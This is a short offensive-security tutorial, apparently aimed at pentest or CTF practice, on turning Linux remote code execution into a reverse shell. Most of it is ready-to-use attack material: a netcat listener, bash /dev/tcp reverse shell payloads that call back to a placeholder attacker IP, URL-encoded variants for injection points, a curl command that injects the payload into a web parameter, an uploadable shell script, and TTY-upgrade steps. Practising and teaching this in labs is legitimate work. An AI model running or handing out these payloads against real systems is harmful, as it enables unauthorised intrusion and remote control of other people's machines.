Linux Remote Code Execution (RCE)
Remote Code Execution (RCE), sometimes just called remote execution, is a critical class of vulnerability that lets an attacker run arbitrary code on a target machine from a remote system. Exploiting it usually ends in full system compromise: the attacker can execute commands, exfiltrate data, escalate privileges, or pivot further into the network.
A common first objective once RCE is found is a reverse shell, a command-line session in which the target system connects back to the attacker's machine. The steps below show how to get one, with examples.
HOW TO
Step 1: Listener on the Attacker’s Machine
On the attacker system, set up a listener to catch the reverse shell connection:
nc -lvnp <attacker-port>
Step 2: Triggering the TCP Reverse Shell on the Target
From the target machine (through the exploited vulnerability), run the reverse shell payload. The three lines below are the same command; they differ only in how it is encoded so that it survives the injection point.
Raw command, for a shell you already control or for a POST body that is URL-encoded for you:
bash -c "bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1"
With & encoded as %26, for a GET or POST parameter where a bare & would be read as a parameter separator:
bash -c "bash -i >%26 /dev/tcp/<attacker-ip>/<attacker-port> 0>%261"
With & encoded as %26 and spaces as +, for a query string that does not accept spaces either:
bash+-c+"bash+-i+>%26+/dev/tcp/<attacker-ip>/<attacker-port>+0>%261"
With curl, sending the raw payload as a POST parameter (--data-urlencode does the encoding for you):
curl http://example.com/path/to/file/cmd.htb --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1'"
If the vulnerability lets you upload a file and execute it, put the payload in a shell script, upload it and run it on the target:
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1
Each variant opens a TCP connection from the target back to <attacker-ip>:<attacker-port> through bash's /dev/tcp pseudo-device: >& sends the interactive shell's stdout and stderr to the socket, and 0>&1 reads its stdin from the same socket, so the listener ends up with a remote shell. The outer bash -c wrapper matters: /dev/tcp is a bash feature, and if the injected command is run by /bin/sh (dash on Debian and Ubuntu) the redirection fails without it.
Step 3: Upgrading to a Fully Interactive Shell
The shell you receive is usually a dumb one: no job control, no tab completion, and CTRL+C kills the connection instead of the running command. To turn it into a usable terminal, first spawn a pseudo-terminal on the target:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then suspend the shell with CTRL+Z, put your local terminal into raw mode and bring the shell back to the foreground:
stty raw -echo; fg
Back inside the reverse shell, reset the terminal and set the shell, terminal type and window size (take the rows and columns from stty size in your own terminal rather than the 38x116 used here):
reset; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116
This gives a stable, fully interactive TTY with job control, tab completion and a working CTRL+C. When the session ends, run stty sane locally to put your own terminal back into cooked mode.
Sources
For more information, and for help choosing a reverse shell that fits your situation, see the resources below: